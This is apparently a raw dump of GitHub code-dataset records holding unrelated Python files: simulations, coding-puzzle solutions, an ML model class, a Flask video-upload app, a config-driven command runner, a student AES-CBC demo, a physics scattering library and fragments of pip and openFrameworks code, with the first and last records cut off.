self.light1.setup()\n        self.light1.setDiffuseColor( of.ofFloatColor.red)\n        self.light1.setPosition(-100, 300, 100)\n\n        self.light2 = of.ofLight()\n        self.light2.setup()\n        self.light2.setDiffuseColor( of.ofFloatColor.blue)\n        self.light2.setPosition(100, 100, -100)\n\n        self.cam = of.ofEasyCam()\n        self.plane = of.ofPlanePrimitive()\n        self.plane.set(10000, 10000)\n        self.plane.rotate(270, 1,0,0)\n        self.plane.move(0, -49, 0)\n\n        self.roadMaterial = of.ofMaterial()\n        self.roadMaterial.setDiffuseColor( of.ofFloatColor.gray )\n        self.roadMaterial.setShininess(0.01)\n        self.car = Car()\n        self.car.setup()\n\n    def update(self):\n        self.car.update()\n\n    def draw(self):\n        of.ofBackgroundGradient(of.ofColor.azure, of.ofColor.lightSlateGray, of.OF_GRADIENT_CIRCULAR)\n        self.cam.begin()\n        self.roadMaterial.begin()\n        self.plane.draw()\n        self.roadMaterial.end()\n        self.car.draw()\n        self.cam.end()\n\n\n\napp = App()\napp.runGL(1024, 768, 
of.OF_WINDOW)","repo_name":"guoguofish/pyOF","sub_path":"build/ofNodeApp.py","file_name":"ofNodeApp.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23177119664","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\n\n# Paramètres de la simulation\nG = 6.67430e-11 # Constante gravitationnelle\ndt = 60 * 60 * 24 # Pas de temps (1 jour en secondes)\nnum_steps = 365 # Nombre d'étapes (1 an)\n\n# Classe représentant un corps céleste\nclass CelestialBody:\n def __init__(self, mass, position, velocity):\n self.mass = mass\n self.position = np.array(position, dtype=float)\n self.velocity = np.array(velocity, dtype=float)\n\n# Initialisation des corps célestes (ex. : Soleil et Terre)\nsun = CelestialBody(mass=1.989e30, position=[0, 0], velocity=[0, 0])\nearth = CelestialBody(mass=5.972e24, position=[1.496e11, 0], velocity=[0, 29783])\nmercury = CelestialBody(mass=3.3011e23, position=[-4.6e10, 0], velocity=[0, -47400])\nvenus = CelestialBody(mass=4.8675e24, position=[-1.07477e11, 0], velocity=[0, -35020])\nmars = CelestialBody(mass=6.4171e23, position=[2.0662e11, 0], velocity=[0, 24007])\njupiter = CelestialBody(mass=1.8982e27, position=[7.4052e11, 0], velocity=[0, 13070])\nsaturn = CelestialBody(mass=5.6834e26, position=[1.35255e12, 0], velocity=[0, 9690])\nuranus = CelestialBody(mass=8.6810e25, position=[2.74130e12, 0], velocity=[0, 6810])\nneptune = CelestialBody(mass=1.02413e26, position=[4.44445e12, 0], velocity=[0, 5430])\n\n# Liste de corps célestes\ncelestial_bodies = [sun, earth, mercury, venus, mars, jupiter, saturn, uranus, neptune]\n\n# Couleurs correspondant à chaque planète\nplanet_colors = {\n \"Soleil\": \"yellow\",\n \"Terre\": \"blue\",\n \"Mercure\": \"gray\",\n \"Vénus\": \"orange\",\n \"Mars\": \"red\",\n \"Jupiter\": \"brown\",\n \"Saturne\": \"gold\",\n \"Uranus\": \"cyan\",\n \"Neptune\": \"blue\"\n}\n\n# Liste des noms de planètes\nplanet_names = list(planet_colors.keys())\n\n# Fonction pour calculer les forces entre les corps\ndef calculate_forces(bodies):\n forces = np.zeros((len(bodies), 2))\n for i, body in enumerate(bodies):\n for j, other_body in enumerate(bodies):\n if i != j:\n displacement = other_body.position - body.position\n distance = np.linalg.norm(displacement)\n force_magnitude = (G * body.mass * other_body.mass) / (distance ** 2)\n force = force_magnitude * (displacement / distance)\n forces[i] += force\n return forces\n\n# Fonction pour mettre à jour les positions et les vitesses\ndef update_positions_and_velocities(bodies, dt):\n forces = calculate_forces(bodies)\n for i, body in enumerate(bodies):\n acceleration = forces[i] / body.mass\n body.velocity += acceleration * dt\n body.position += body.velocity * dt\n\n# Animation\nfig, ax = plt.subplots()\n\ndef animate(frame):\n update_positions_and_velocities(celestial_bodies, dt)\n x = [body.position[0] for body in celestial_bodies]\n y = [body.position[1] for body in celestial_bodies]\n sc.set_offsets(np.c_[x, y])\n\n for name, body in zip(planet_names, celestial_bodies):\n ax.annotate(name, (body.position[0], body.position[1]), color=planet_colors[name], fontsize=8, ha='center')\n\n return sc,\n\nx = [body.position[0] for body in celestial_bodies]\ny = [body.position[1] for body in celestial_bodies]\nsc = ax.scatter(x, y)\n\nax.set_xlim(-3e12, 3e12)\nax.set_ylim(-3e12, 3e12)\nax.set_title(\"Simulation du Système Solaire\")\n\nani = 
animation.FuncAnimation(fig, animate, frames=num_steps, interval=100, blit=True)\n\n# Afficher une légende avec les couleurs et les noms des planètes\nlegend_handles = [plt.Line2D([0], [0], marker='o', color='w', markerfacecolor=color, markersize=8, label=name) for name, color in planet_colors.items()]\nax.legend(handles=legend_handles, loc='upper left')\n\nplt.show()\n","repo_name":"MarieFlechon/Solar-System-Simulation","sub_path":"solarsystem.py","file_name":"solarsystem.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74529530113","text":"from __future__ import division\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport geffnet\n\nfrom custom.efficientNet.geffnet.activations.activations import Sigmoid\nfrom .. import builder\nfrom ..registry import EFFICIENTPS\nfrom .base import BaseDetector\nfrom custom.mmdet.ops.norm import norm_cfg\n\nimport time\nimport cv2\nimport numpy as np\n\nfrom ...ops import ConvModule\n\n\nclass FeatureFusion(nn.Module):\n def __init__(self, norm_cfg=dict(type='InPlaceABNSync', activation='leaky_relu',\n activation_param=0.01, requires_grad=True)):\n super(FeatureFusion, self).__init__()\n self.in_channels = [296, 320, 432, 2304]\n self.convs = nn.ModuleList()\n for i in range(0, 4):\n self.convs.append(\n ConvModule(\n in_channels=self.in_channels[i],\n out_channels=256,\n kernel_size=3,\n padding=1,\n conv_cfg=None,\n act_cfg=None,\n norm_cfg=norm_cfg))\n\n self.sigmoid = Sigmoid()\n self.conv_1x1 = ConvModule(\n 256,\n 256,\n 1,\n conv_cfg=None,\n act_cfg=None,\n norm_cfg=norm_cfg)\n\n def forward(self, p_s, range_s):\n\n '''\n :param p_s: features from 2 way fpn\n :param range_s: features from REN\n :return: fused features\n '''\n # torch.autograd.set_detect_anomaly(True)\n p_s = list(p_s)\n range_s = list(range_s)\n fused_feats = []\n print(len(p_s), len(range_s), len(self.convs))\n assert len(p_s) == len(range_s) == len(self.convs)\n\n for i in range(len(p_s)):\n # REN and FPN concat at each scale\n fused_feats.append(torch.cat((p_s[i], range_s[i]), dim=1))\n print(len(fused_feats))\n for i in range(len(p_s)):\n print(fused_feats[i].shape)\n z = self.convs[i](fused_feats[i])\n print(z.shape)\n z = self.conv_1x1(z)\n fused_feats[i] = self.sigmoid(z)\n return fused_feats\n\n\n@EFFICIENTPS.register_module\nclass EfficientPS(BaseDetector):\n\n def __init__(self,\n backbone,\n neck=None,\n semantic_head=None,\n shared_head=None,\n pretrained=None):\n assert backbone is not None\n\n super(EfficientPS, self).__init__()\n\n self.eff_backbone_flag = False if 'efficient' not in backbone['type'] else True\n\n print(backbone)\n\n if self.eff_backbone_flag == False:\n self.backbone = builder.build_backbone(backbone)\n else:\n # type = tf_efficientnet_b5\n # scaling coefficient 1.6 2.2 456\n self.backbone = geffnet.create_model(backbone['type'],\n pretrained=True if pretrained is not None else False,\n se=False,\n # type = tf_efficientnet_b5\n act_layer=backbone['act_cfg']['type'],\n norm_layer=norm_cfg[backbone['norm_cfg']['type']][1],\n in_channels=backbone['in_channels'])\n\n print('num_outs', neck['num_outs'])\n self._num_out = neck['num_outs']\n if neck is not None:\n self.neck = builder.build_neck(neck)\n\n if shared_head is not None:\n self.shared_head = builder.build_shared_head(shared_head)\n\n if semantic_head is not None:\n self.semantic_head = builder.build_head(semantic_head)\n\n 
self.init_weights(pretrained=pretrained)\n\n def init_weights(self, pretrained=None):\n if self.eff_backbone_flag == False:\n self.backbone.init_weights(pretrained=pretrained)\n\n self.neck.init_weights()\n\n if self.with_shared_head:\n self.shared_head.init_weights(pretrained=pretrained)\n # self.semantic_head.init_weights()\n\n def extract_feat(self, img):\n \"\"\"Directly extract features from the backbone+neck\n \"\"\"\n x = self.backbone(img)\n y = self.neck(x)\n return x, y\n\n def forward_train(self, img):\n x, y = self.extract_feat(img)\n semantic = self.semantic_head(y[:self._num_out])\n return x, semantic\n","repo_name":"HannahHaensen/pyfu","sub_path":"custom/mmdet/models/efficientps/efficientPS.py","file_name":"efficientPS.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"23622704711","text":"#!/usr/bin/python4\r\nimport string\r\nfilename = '/Users/sandeepsawant/Data/EclipseWorkspace/Code jam/src/D-large'\r\nobjfile = open('%s.in' % filename, 'r')\r\ncounter = -1\r\nres = []\r\nintNum = 0\r\nfor ln in objfile.readlines():\r\n counter += 1\r\n if not counter:\r\n continue\r\n if not intNum:\r\n intNum = int(ln.replace('\\n', ''))\r\n counter -= 1\r\n continue\r\n ln = ln.replace('\\n', '').split(' ')\r\n intNumSum1 = [int(i) for i in ln]\r\n intNumSum2 = [int(i) for i in ln]\r\n intNumSum2.sort()\r\n intHits = 0\r\n for i in range(0, intNum):\r\n if intNumSum1[i] != intNumSum2[i]:\r\n intHits += 1\r\n res.append('Case #%s: %s' % (counter, intHits))\r\n intNum = 0\r\nobjfile.close()\r\nobjfile = open('/Users/sandeepsawant/Data/EclipseWorkspace/Code jam/src/test.out', 'w')\r\nobjfile.write(string.join(res, '\\n'))\r\nobjfile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_77/290.py","file_name":"290.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44869056393","text":"\"\"\"ThreatConnect TI Incident\"\"\"\nfrom ..group import Group\n\n\nclass Incident(Group):\n \"\"\"Unique API calls for Incident API Endpoints\n\n Valid status:\n + Closed\n + Containment Achieved\n + Deleted\n + Incident Reported\n + Open\n + New\n + Rejected\n + Restoration Achieved\n + Stalled\n\n Args:\n tcex (TcEx): An instantiated instance of TcEx object.\n event_date (str, kwargs): The incident event date expression for this Group.\n name (str, kwargs): [Required for Create] The name for this Group.\n status (str, kwargs): The status for this Group.\n \"\"\"\n\n def __init__(self, tcex, **kwargs):\n \"\"\"Initialize Class Properties.\"\"\"\n super().__init__(\n tcex, sub_type='Incident', api_entity='incident', api_branch='incidents', **kwargs\n )\n\n def event_date(self, event_date):\n \"\"\"Update the event_date.\n\n Args:\n event_date: Converted to %Y-%m-%dT%H:%M:%SZ date format.\n\n Returns:\n\n \"\"\"\n if not self.can_update():\n self._tcex.handle_error(910, [self.type])\n\n event_date = self._utils.datetime.format_datetime(\n event_date, date_format='%Y-%m-%dT%H:%M:%SZ'\n )\n self._data['eventDate'] = event_date\n request = {'eventDate': event_date}\n return self.tc_requests.update(self.api_type, self.api_branch, self.unique_id, request)\n\n def status(self, status):\n \"\"\"Update the incidents status\n\n Valid status:\n + Closed\n + Containment Achieved\n + Deleted\n + Incident Reported\n + Open\n + New\n + Rejected\n + Restoration Achieved\n + 
Stalled\n\n Args:\n status: Closed, Containment Achieved, Deleted, Incident Reported, Open, New, Rejected,\n Restoration Achieved, Stalled.\n\n Returns:\n\n \"\"\"\n if not self.can_update():\n self._tcex.handle_error(910, [self.type])\n\n self._data['status'] = status\n request = {'status': status}\n return self.tc_requests.update(self.api_type, self.api_branch, self.unique_id, request)\n","repo_name":"ThreatConnect-Inc/threatconnect-developer-docs","sub_path":"tcex/tcex/threat_intelligence/mappings/group/group_types/incident.py","file_name":"incident.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"73986813635","text":"#Project Euler problem 3\n\nnum = 600851475143\nsqrt = int(num**0.5)\nprimefactors = {}\n\nfor i in range (2,sqrt):\n while num % i == 0:\n num = num/i\n primefactors[i] = 1\nif num != 1:\n print(num)\nelse:\n print(max(primefactors.keys()))\n\n","repo_name":"yavuzff/Project-Euler","sub_path":"p03.py","file_name":"p03.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"20225336866","text":"import heapq\n# heapq 는 원래 최소힙 제공함\n\nT = int(input())\nfor _ in range(T):\n n = int(input())\n queue = list(map(int, input().split()))\n total = 0\n\n heapq.heapify(queue)\n # queue = []\n # for i in data:\n # heapq.heappush(queue, i)\n while len(queue) > 1:\n x = heapq.heappop(queue)\n y = heapq.heappop(queue)\n\n total += (x+y)\n heapq.heappush(queue, x+y)\n\n print(total)\n","repo_name":"ko509/Weekly-AlgoStudy","sub_path":"1차/3주차/우민지/[13975] 파일합치기3.py","file_name":"[13975] 파일합치기3.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"11216308980","text":"#\n# [55] Jump Game\n#\n# https://leetcode.com/problems/jump-game/description/\n#\n# algorithms\n# Medium (29.57%)\n# Total Accepted: 156.1K\n# Total Submissions: 527.8K\n# Testcase Example: '[2,3,1,1,4]'\n#\n# \n# Given an array of non-negative integers, you are initially positioned at the\n# first index of the array.\n# \n# \n# Each element in the array represents your maximum jump length at that\n# position. \n# \n# \n# Determine if you are able to reach the last index.\n# \n# \n# \n# For example:\n# A = [2,3,1,1,4], return true.\n# \n# \n# A = [3,2,1,0,4], return false.\n# \n#\nclass Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n # 5 star. \n step = nums[0]\n for i in range(1, len(nums)):\n if step > 0:\n step -= 1\n step = max(step, nums[i])\n else:\n return False\n return True\n","repo_name":"goalong/lc","sub_path":"v1/55.jump-game.133293052.ac.py","file_name":"55.jump-game.133293052.ac.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"24687436241","text":"\"\"\"\nTODO\n\"\"\"\nimport numpy as _np\n\nfrom .. 
import ureg as _ureg\n\n\nclass ScatteringModelType(type):\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n return 0.0\n\n\nclass FermiRossi(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n es = 15.0 # MeV\n chi_0 = kwargs[\"material\"].radiation_length.m_as(\"cm\")\n return (es / pv) ** 2 * (1 / chi_0)\n\n\nclass DifferentialHighland(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def length(x, chi0):\n \"\"\"\n\n Args:\n x:\n chi0:\n\n Returns:\n\n \"\"\"\n return x / chi0\n\n @staticmethod\n def f_dh(length):\n \"\"\"\n\n Args:\n length:\n\n Returns:\n\n \"\"\"\n return 0.970 * (1 + (_np.log(length) / 20.7)) * (1 + (_np.log(length) / 22.7))\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n material = kwargs.get(\"material\")\n es = 14.1 # MeV\n chi0 = material.radiation_length.m_as(\"cm\")\n x = material.required_thickness(kinetic_energy_out=pv * _ureg.MeV, kinetic_energy_in=p1v1 * _ureg.MeV).m_as(\n \"cm\",\n )\n return DifferentialHighland.f_dh(DifferentialHighland.length(x, chi0)) * (es / pv) ** 2 * (1 / chi0)\n\n\nclass ICRU(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n pass\n\n\nclass ICRUProtons(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n material = kwargs[\"material\"]\n es = 15.0 # MeV\n chi_s = material.scattering_length.m_as(\"cm\")\n return (es / pv) ** 2 * (1 / chi_s)\n\n\nclass DifferentialMoliere(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n material = kwargs[\"material\"]\n es = 15.0 # MeV\n chi_s = material.scattering_length.m_as(\"cm\")\n return DifferentialMoliere.f_dm(p1v1, pv) * (es / pv) ** 2 * (1 / chi_s)\n\n @staticmethod\n def f_dm(p1v1: float, pv: float):\n \"\"\"\n\n Args:\n p1v1:\n pv:\n\n Returns:\n\n \"\"\"\n if pv <= 0:\n raise ValueError(\"'pv' must be > 0.\")\n if p1v1 <= 0:\n raise ValueError(\"'p1v1' must be > 0.\")\n if p1v1 <= pv:\n raise ValueError(\"Initial 'p1v1' must be larger than final 'pv'.\")\n return (\n 0.5244\n + 0.1975 * _np.log10(1 - (pv / p1v1) ** 2)\n + 0.2320 * _np.log10(pv)\n - 0.0098 * _np.log10(pv) * _np.log10(1 - (pv / p1v1) ** 2)\n )\n","repo_name":"ULB-Metronu/georges","sub_path":"georges/fermi/mcs.py","file_name":"mcs.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"71178299715","text":"from typing import Literal\n\nfrom davmerger.editor import Editor\n\n\nLAST_CHOICE_FILE = \"\"\nLAST_CHOICE_OUTPUT = \"\"\n\ndef choice_files() -> tuple[str]:\n global LAST_CHOICE_FILE\n\n from tkinter import Tk, filedialog\n Tk().withdraw()\n\n videos: tuple[str] | Literal[''] = filedialog.askopenfilenames(\n title=\"Selecione as gravações\", \n filetypes=(\n (\"Arquivos DAV\", \"*.dav\"), \n (\"Todos os arquivos\", \"*.*\")\n ),\n initialdir=LAST_CHOICE_FILE,\n initialfile=LAST_CHOICE_FILE\n )\n\n if videos:\n LAST_CHOICE_FILE = videos[-1]\n \n if 
not videos:\n return tuple()\n \n return videos\n\n\ndef ask_output_filename() -> str:\n global LAST_CHOICE_OUTPUT\n\n from tkinter import Tk, filedialog\n Tk().withdraw()\n\n file_path = filedialog.asksaveasfilename(\n defaultextension=\".mp4\",\n filetypes=((\"Vídeos MP4\", \"*.mp4\"), (\"Todos Arquivos\", \"*.*\")),\n title=\"Salvar arquivo como...\",\n initialdir=LAST_CHOICE_OUTPUT,\n initialfile=LAST_CHOICE_OUTPUT\n )\n\n LAST_CHOICE_OUTPUT = file_path\n\n return file_path\n\n\ndef save_video(files: tuple[str], output: str) -> bool:\n try:\n ed = Editor(files)\n ed.save(output, speed_times=64.0)\n except Exception as e:\n print(f\"Falha ao salvar vídeo: {e}\")\n return False\n \n return True\n\n\ndef main():\n all_files: list[dict] = []\n while True:\n files: tuple[str] = choice_files()\n if not files:\n break\n output_file: str = ask_output_filename()\n\n if not output_file:\n print(\"Erro fatal! Escolha um arquivo!!\")\n exit(1)\n \n all_files.append({\n \"files\": files,\n \"output\": output_file\n })\n\n print(all_files[-1])\n\n if not all_files:\n print(\"Erro faltal! Nenhum vídeo selecionado!!\")\n exit(1)\n \n for i, file in enumerate(all_files, start=1):\n print(f\"{i}/{len(all_files)} Renderizando Vídeo:\")\n save_video(file['files'], file['output'])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"edvitor13/davmerger","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70969050753","text":"import pyaes\nimport os\n\nfrom tools.time_execution import time_exec\n\ndef random(size=16):\n rand = os.urandom(size)\n return rand\n\n\nclass AES_CBC:\n rounds_by_key_size = {16: 10, 24: 12, 32: 14}\n\n def __init__(self, key, iv):\n assert len(key) in AES_CBC.rounds_by_key_size\n self.iv = [iv[i] for i in range(len(iv))]\n self.aes = pyaes.AES(key)\n\n def strxor_bytes(self, a, b):\n if len(a) > len(b):\n return [(x ^ y) for (x, y) in zip(a[:len(b)], b)]\n else:\n return [(x ^ y) for (x, y) in zip(a, b[:len(a)])]\n\n def PKCS_pad(self, text):\n padding_len = 16 - (len(text) % 16)\n for i in range(padding_len):\n text += chr(padding_len)\n return text\n\n def PKCS_unpad(self, text):\n padding_len = ord(text[-1])\n assert padding_len > 0\n message, padding = text[:-padding_len], text[-padding_len:]\n assert all(ord(p) == padding_len for p in padding)\n return message\n\n def split_16bytes(self, message):\n assert len(message) % 16 == 0\n message_16bytes = [message[i:i + 16] for i in range(0, len(message), 16)]\n return message_16bytes\n\n def encrypt_cbc(self, text):\n iv = self.iv\n text = self.PKCS_pad(text)\n\n blocks = []\n previous = iv.copy()\n\n for text_block in self.split_16bytes(text):\n text_block_bytes = [ord(c) for c in text_block]\n block = self.aes.encrypt(self.strxor_bytes(text_block_bytes, previous))\n blocks.extend(block)\n previous = block\n\n return \"\".join([chr(blocks[i]) for i in range(len(blocks))])\n\n def decrypt_cbc(self, cipher):\n iv = self.iv\n\n blocks = []\n previous = iv.copy()\n\n for cipher_block in self.split_16bytes(cipher):\n cipher_block_bytes = [ord(c) for c in cipher_block]\n block = self.strxor_bytes(previous, self.aes.decrypt(cipher_block_bytes))\n blocks.extend(block)\n previous = cipher_block_bytes\n\n return self.PKCS_unpad(\"\".join([chr(blocks[i]) for i in range(len(blocks))]))\n\n\n@time_exec\ndef aes_cbc(plaintext, key, show=False):\n iv = b'initializationVe'\n\n aes = AES_CBC(key, 
iv)\n\n    ciphertext = aes.encrypt_cbc(plaintext)\n    if show:\n        print(\"-----------------------------\")\n        print('ciphertext AES_CBC:', ciphertext)\n\n    decrypted = aes.decrypt_cbc(ciphertext)\n    if show:\n        print('decrypted by AES_CBC:', decrypted)\n        print(\"-----------------------------\\n\")","repo_name":"lipskydan/rc4_salsa20_aes5StreamingModes","sub_path":"AES/aes_cbc.py","file_name":"aes_cbc.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7948830604","text":"#!/usr/bin/env python3\n\nimport toml\nimport click\nimport subprocess\n\n\ndef load_config():\n\twith open('.tbc.toml') as f:\n\t\treturn toml.loads(f.read())\n\ndef execute(config, command):\n\tif command != \"\":\n\t\t# requested\n\t\texecution_key = command\n\telse:\n\t\t# first\n\t\texecution_key = next(iter(config))\n\t\n\texe = config[execution_key]['exe']\n\texecutable_string = str(exe)\n\n\tif 'args' in config[execution_key]:\n\t\targs = config[execution_key]['args']\n\t\targs = [args] if isinstance(args, str) else args\n\t\texecutable_string += ' '\n\t\texecutable_string += ' '.join(args)\n\n\tsubprocess.call(executable_string, shell=True)\n\n@click.command()\n@click.option('--list-commands', is_flag=True, help=\"List available commands\")\n@click.argument('command', default=\"\")\ndef main(command, list_commands):\n\t\"\"\"Tools By Config reads .tbc.toml and executes commands with arguments defined in there.\n\n\tExample .tbc.toml:\n\n\t\\b\n\t[echo]\n\t\texe = \"echo\"\n\t\targs = [\"Hello\", \"World\"]\n\n\tExample launch: `tbc.py echo` or just `tbc.py`\"\"\"\n\tconfig = load_config()\n\tif list_commands:\n\t\tprint('Available options are {cmds}.'.format(cmds=', '.join(list(config.keys()))))\n\t\texit()\n\tif command != \"\" and command not in config:\n\t\tprint(f'{command} can not be found in .tbc.toml')\n\t\tprint('Available options are {cmds}.'.format(cmds=', '.join(list(config.keys()))))\n\telse:\n\t\texecute(config, command)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"AndiH/tools-by-config","sub_path":"tbc.py","file_name":"tbc.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71830201473","text":"from django.test import SimpleTestCase\n\nfrom bennedetto.utils import expand_url_path\n\n\nclass UtilsTestCase(SimpleTestCase):\n    def test_expand_url_path(self):\n        path = '/test/one/'\n        domain = 'test.com:8080'\n\n        actual = expand_url_path(path, domain=domain)\n        expected = 'test.com:8080/test/one/'\n        self.assertEqual(actual, expected)\n\n        path = '/test/two/'\n        domain = 'test.com'\n\n        actual = expand_url_path(path, domain=domain)\n        expected = 'test.com/test/two/'\n        self.assertEqual(actual, expected)\n","repo_name":"arecker/bennedetto","sub_path":"bennedetto/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":308,"dataset":"github-code","pt":"61"}
+{"seq_id":"32480449697","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import optimize, special\n\n\ndef poisson(k, lamb):\n    \"\"\"poisson pdf, parameter lamb is the fit parameter\"\"\"\n    return (lamb**k/special.factorial(k)) * np.exp(-lamb)\n\n\ndef negLogLikelihood(params, data):\n    \"\"\"the negative log-likelihood function\"\"\"\n    lnl = - np.sum(np.log(poisson(data, params[0])))\n    return lnl\n\n\n# NOTE: 'data' (the observed counts) is assumed to be provided by the surrounding exercise\n# minimize the negative log-Likelihood\nresult = optimize.minimize(negLogLikelihood, x0=[1], args=(data,))\n\nprint(result)\n\n# plot 
poisson-deviation with fitted parameter\nx_plot = np.linspace(0, 12, 1500)\n\nplt.hist(data.ravel(), bins=np.arange(12) - 0.5, density=True,)\nplt.plot(x_plot, poisson(x_plot, result.x), 'r-', lw=2)\n","repo_name":"Asterics2020-Obelics/School2019","sub_path":"scipy/solution_7.py","file_name":"solution_7.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"32226960235","text":"from flask import Flask, request, render_template, send_from_directory, abort\nimport os\nimport base64\nimport narrator\n\napp = Flask(__name__)\nUPLOAD_FOLDER = None\nFILE_NAME = None\nALLOWED_EXTENSIONS = {'mp4', 'avi', 'mov', 'mkv'}\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_video():\n global UPLOAD_FOLDER, FILE_NAME\n if request.method == 'POST':\n unique_id = base64.urlsafe_b64encode(os.urandom(30)).decode(\"utf-8\").rstrip(\"=\")\n dir_path = os.path.join(\"narration\", unique_id)\n os.makedirs(dir_path, exist_ok=True)\n UPLOAD_FOLDER = dir_path\n # Check if the post request has the file part\n if 'file' not in request.files:\n return 'No file part in the request'\n file = request.files['file']\n if file.filename == '':\n return 'No selected file'\n if file and allowed_file(file.filename):\n filepath = os.path.join(UPLOAD_FOLDER, file.filename)\n file.save(filepath)\n FILE_NAME = file.filename\n generate_video(video_path=filepath)\n\n return render_template('index.html')\n\n@app.route('/generate', methods=['POST'])\ndef generate_video(video_path):\n global UPLOAD_FOLDER\n # Call the processing function from narrator.py\n # Adjust this part to handle the processing and store the processed video in PROCESSED_FOLDER\n processed_video_path = narrator.process_video(video_path,UPLOAD_FOLDER)\n return 'Processing started' # Adjust as needed\n\n@app.route('/download')\ndef download_file():\n global UPLOAD_FOLDER, FILE_NAME\n filename = f'{FILE_NAME}_out.mp4'\n try:\n return send_from_directory(UPLOAD_FOLDER, filename, as_attachment=True)\n except FileNotFoundError:\n abort(404)\n\nif __name__ == '__main__':\n app.run(debug=True) # Set debug=False in a production environment\n","repo_name":"Addy-codes/Insightful-Echo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37877073765","text":"import hashlib\nimport logging\nimport sys\nfrom optparse import Values\nfrom pip._internal.cli.base_command import Command\nfrom pip._internal.cli.status_codes import ERROR, SUCCESS\nfrom pip._internal.utils.hashes import FAVORITE_HASH, STRONG_HASHES\nfrom pip._internal.utils.misc import read_chunks, write_output\nfrom typing import List\n\nlogger = logging.getLogger(__name__)\n\n\nclass HashCommand(Command):\n \"\"\"\n Compute a hash of a local package archive.\n\n These can be used with --hash in a requirements file to do repeatable\n installs.\n \"\"\"\n\n usage = '%prog [options] ...'\n ignore_require_venv = True\n\n def add_options(self):\n # type: () -> None\n self.cmd_opts.add_option(\n '-a', '--algorithm',\n dest='algorithm',\n choices=STRONG_HASHES,\n action='store',\n default=FAVORITE_HASH,\n help='The hash algorithm to use: one of {}'.format(\n ', '.join(STRONG_HASHES)))\n self.parser.insert_option_group(0, self.cmd_opts)\n\n def run(self, options, 
